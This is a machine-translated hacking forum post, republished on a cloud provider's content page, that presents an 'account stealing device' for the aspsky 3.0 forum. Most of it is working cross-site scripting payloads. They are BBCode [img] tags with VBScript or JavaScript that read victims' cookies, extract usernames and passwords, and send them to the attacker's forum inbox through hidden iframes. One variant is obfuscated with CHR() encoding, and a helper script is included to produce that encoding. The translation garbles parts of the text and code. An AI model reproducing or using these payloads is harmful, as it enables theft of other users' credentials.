Perfect solution for Cross-Site Scripting cookie box

Source: Internet
Author: User

First, we can see the self. Window Method on the wings of hope.
In fact, I have always had a solution that I never told anyone:
I 've been playing for a long time and announced it:
<HTML>
<Script language = vbs>
Sub changeq ()
If form1.loc. value = "" Or form1.who. value = "" then
Msgbox "is not added to the address or user name? "
Exit sub
End if
Loc = form1.loc. Value
User = form1.who. Value
STR = "[img] VBScript: Execute (" On Error resume next: Call document. Body. InSE
Rtadjacenthtml ("" beforeend "", "" <Div style = display: none &
GT; <IFRAME id = sendmessage> </iframe> </div> ""): Call Se
Ndmessage. Window. Open ("" & loc & "/messanger. asp? Action = Send & touser ="
& User & "& Title =" "+ mid (document. Cookie, instr (lcase (document. Cookie ),
"" Password "") + 9, 10) + "" & message = "" + "" I am a goo
D boy "", "_ Self" ")") [/img]"
Form1.area. value = Str
End sub

</SCRIPT>
<Body>
<Font size = 7 color = Red> aspsky 3.0 account stealing device --- c.z. y original </font>
<Form name = form1>
Set the Sending address: <input type = text name = loc size = 50> <br>
Note that the sending Address is like [url] http://www.nnit30.com/newbbs#/url] (newbbs is the installation directory of the Forum on the website.
Last
No need to add/) <br>
User name for sending: <input type = text name = who size = 20> -------------
<Input type = button name = change value = generate code onclick = changeq ()> <br>
Generated code: <textarea name = Area Rows = 10 Cols = 100> </textarea>
</Form>
</Body>
</Html>

After a long time, I stole the aspsky 3.0 password and changed the following code.
Then it is sent to your post. As long as someone looks at your post, his password will be automatically sent to your
The mailbox on the forum is in place. I actually use JavaScript For snwcwt written in VBScript.
There is no double quotation marks, and several lines of code can be written at the same time, so it should be practical !!
However, the results are almost the same :) (note that you must change the address of the sent message first.
And write it all in one line)
[Img] VBScript: window. Open (CHR (104) & CHR (116) & CHR (116) & CHR (58) & CHR (47) & Ch
R (47) & CHR (119) & CHR (119) & CHR (119) & CHR (46) & CHR (110) & CHR (110) & CHR (105) & CHR (116) & Chr
(51) & CHR (48) & CHR (46) & CHR (99) & CHR (111) & CHR (109) & CHR (47) & CHR (110) & CHR (101) & CHR (119
) & CHR (98) & CHR (98) & CHR (115) & CHR (47) & CHR (109) & CHR (101) & CHR (115) & CHR (115) & CHR (97) & C
HR (110) & CHR (103) & CHR (101) & CHR (114) & CHR (46) & CHR (97) & CHR (115) & CHR (112) & CHR (63) & Chr
(97) & CHR (99) & CHR (116) & CHR (105) & CHR (111) & CHR (110) & CHR (61) & CHR (115) & CHR (101) & CHR (1
10) & CHR (100) & CHR (38) & CHR (116) & CHR (111) & CHR (117) & CHR (115) & CHR (114) & CHR (6
1) & CHR (99) & CHR (122) & CHR (121) & CHR (38) & CHR (116) & CHR (105) & CHR (116) & CHR (108) & CHR (101
) & CHR (61) & CHR (104) & CHR (105) & CHR (104) & CHR (105) & CHR (38) & CHR (109) & CHR (101) & CHR (115)
& CHR (115) & CHR (97) & CHR (103) & CHR (101) & CHR (61) + CHR (80) & CHR (97) & CHR (115) & CHR (115) & Ch
R (58) + mid (lcase (document. Cookie), instr (lcase (document. Cookie), CHR (112) + CHR (97) + C
HR (115) + CHR (115) + CHR (119) + CHR (111) + CHR (114) + CHR (100) + 9, Len (document. cookie)-ins
TR (lcase (document. Cookie), CHR (112) + CHR (97) + CHR (115) + CHR (115) + CHR (119) + CHR (111) + C
HR (114) + CHR (100) + 9) + CHR (32) + CHR (32) + CHR (32) + CHR (78) & CHR (97) & CHR (109) & Ch
R (101) & CHR (58) + mid (lcase (document. Cookie), instr (lcase (document. Cookie), CHR (117) +
CHR (115) + CHR (101) + CHR (114) + CHR (110) + CHR (97) + CHR (109) + CHR (101) + 9, (instr (lcase (do
Cument. cookie), CHR (117) + CHR (115) + CHR (101) + CHR (114) + CHR (99) + CHR (108) + CHR (97) + CHR (
115)-1)-instr (lcase (document. Cookie), CHR (117) + CHR (115) + CHR (101) + CHR (11
0) + CHR (97) + CHR (109) + CHR (101)-9), CHR (49) & CHR (49), CHR (116) & CHR (111) & CHR (112) & CHR (
61) & CHR (50) & CHR (48) & CHR (48) & CHR (48) & CHR (44) & CHR (108) & CHR (101) & CHR (102) & CHR (116 )&
CHR (61) & CHR (50) & CHR (48) & CHR (48) & CHR (48) & CHR (44) & CHR (104) & CHR (101) & CHR (105) & CHR (1
03) & CHR (104) & CHR (116) & CHR (61) & CHR (49) & CHR (44) & CHR (119) & CHR (105) & CHR (100) & CHR (116
) & CHR (104) & CHR (61) & CHR (49) [/img]

Simplified Form: window. Open (opened connection, form name, form size settings)
Open connection:
Part 1: http://xxx.xxx.xxx.xxx/xxxx/messanger.asp? Action = Send .....
The corresponding encoding is

CHR (104) & CHR (116) & CHR (116) & CHR (112) & CHR (58) & CHR (47) & CHR (47) & CHR (119 )&
CHR (119) & CHR (119) & CHR (46) & CHR (110) & CHR (110) & CHR (105) & CHR (116) & CHR (51) & CHR (48) & Ch
R (46) & CHR (99) & CHR (111) & CHR (109) & CHR (47) & CHR (110) & CHR (101) & CHR (119) & CHR (98) & CHR (9
8) & CHR (115) & CHR (47) & CHR (109) & CHR (101) & CHR (115) & CHR (97) & CHR (110) & CHR (103
) & CHR (101) & CHR (114) & CHR (46) & CHR (97) & CHR (115) & CHR (112) & CHR (63) & CHR (97) & CHR (99) & Ch
R (116) & CHR (105) & CHR (111) & CHR (110) & CHR (61) & CHR (115) & CHR (101) & CHR (110) & CHR (100) & Ch
R (38) & CHR (116) & CHR (111) & CHR (117) & CHR (115) & CHR (101) & CHR (114) & CHR (61) & CHR (99) & CHR (
122) & CHR (121) & CHR (38) & CHR (116) & CHR (105) & CHR (116) & CHR (108) & CHR (61) & CHR (1
04) & CHR (105) & CHR (104) & CHR (105) & CHR (38) & CHR (109) & CHR (101) & CHR (115) & CHR (115) & CHR (9
7) & CHR (103) & CHR (101) & CHR (61)

For different websites, you should change the user names here.
For encoding, see the following code:

<HTML>
<Script language = vbs>
Sub main ()
Base = form1.text1. Value
For I = 1 to Len (base)
AA = ASC (mid (base, I, 1 ))
Document. Write "CHR (" & aa &")"&"&"
Next
End sub
</SCRIPT>
<Body> <form name = form1> <Table>
<Tr> <TD>
<Input type = text name = text1 size = 40> <br>
<Input type = button name = button1 onclick = Main () value = change>
</TD> </tr>
</Table> </form> </body>

Part 2: the username and password in the extracted cookie

------------------------ Let's start learning about JavaScript ----------------------------------

[Img] javascript: eval ('var mycookie = Document. Cookie; var iuser0 = mycookie. indexof (/
'Username =/'); var iuser1 = mycookie. indexof (/' &/', iuser0); If (iuser1 =-1) iuser1 = My
Cookie. length; var username = mycookie. substring (iuser0 + 9, iuser1); var ipw0 = mycookie
. Indexof (/'password =/'); ipw1 = mycookie. indexof (/' &/', ipw0); If (ipw1 =-1) ipw1 = myco
Okie. length; var Password = mycookie. substring (ipw0 + 9, ipw1); document. Body. insertadj
Acenthtml (/'beforeend/',/' <Div style = display: block> <IFRAME id = sendmessage src = me
Ssanger. asp? Action = new & touser = snwcwt> </iframe> </div>/'{%sendmessage.##doc um
Ent. Location =/'[ url] http://www.nnit30.com/newbbs/messanger.asp? Action = Send & touser = snw [/url]
CWT & Title =/'+ username +/' password & message = username =/'+ username +/'password =/' + Pa
Ssword +/';') [/img]

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.